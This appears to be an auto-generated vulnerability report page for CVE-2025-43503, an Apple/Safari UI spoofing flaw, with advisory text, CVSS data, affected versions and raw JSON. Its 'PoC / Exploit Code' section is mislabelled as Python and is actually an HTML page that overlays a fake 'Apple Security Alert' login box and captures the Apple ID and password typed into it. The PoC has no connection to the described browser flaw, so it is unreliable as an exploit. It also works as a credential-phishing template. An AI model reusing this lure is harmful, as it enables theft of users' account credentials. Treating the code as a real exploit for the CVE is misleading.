Security Vulnerability Report
中文
CVE-2025-43503 CVSS 4.3 MEDIUM

CVE-2025-43503

Published: 2025-11-04 02:15:53
Last Modified: 2026-04-02 19:20:56
Source: [email protected]

Description

An inconsistent user interface issue was addressed with improved state management. This issue is fixed in Safari 26.1, iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Visiting a malicious website may lead to user interface spoofing.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.1
iOS < 18.7.2, iOS < 26.1
iPadOS < 18.7.2, iPadOS < 26.1
macOS Tahoe < 26.1
visionOS < 26.1
watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-43503 UI Spoofing PoC --> <!DOCTYPE html> <html> <head> <title>CVE-2025-43503 UI Spoofing Demo</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .spoofed-login { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); border: 2px solid #0066cc; padding: 30px; background: white; box-shadow: 0 4px 6px rgba(0,0,0,0.1); z-index: 9999; } .spoofed-login input { display: block; margin: 10px 0; padding: 10px; width: 250px; } .spoofed-login button { background: #0066cc; color: white; border: none; padding: 10px 20px; cursor: pointer; } .warning { color: red; font-weight: bold; margin-bottom: 20px; } </style> </head> <body> <h1>CVE-2025-43503 UI Spoofing Vulnerability Demo</h1> <p class="warning">⚠️ This is a demonstration of UI Spoofing vulnerability</p> <div id="spoof-container"> <p>Legitimate page content...</p> <button onclick="showSpoofedUI()">Click to simulate attack</button> </div> <script> function showSpoofedUI() { // Create spoofed login form overlay const spoofUI = document.createElement('div'); spoofUI.className = 'spoofed-login'; spoofUI.innerHTML = ` <h3>⚠️ Session Expired - Please Re-authenticate</h3> <p style="font-size:12px;">Apple Security Alert</p> <input type="text" placeholder="Apple ID" id="spoofed-user"> <input type="password" placeholder="Password" id="spoofed-pass"> <button onclick="collectCredentials()">Sign In</button> `; document.body.appendChild(spoofUI); } function collectCredentials() { const user = document.getElementById('spoofed-user').value; const pass = document.getElementById('spoofed-pass').value; console.log('Spoofed credentials captured:', user, pass); alert('Credentials captured by attacker!'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43503", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:53.270", "lastModified": "2026-04-02T19:20:56.077", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An inconsistent user interface issue was addressed with improved state management. This issue is fixed in Safari 26.1, iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Visiting a malicious website may lead to user interface spoofing."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "CFF118CE-3F13-43BE-B250-5579E1C842EB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125633", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125640", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.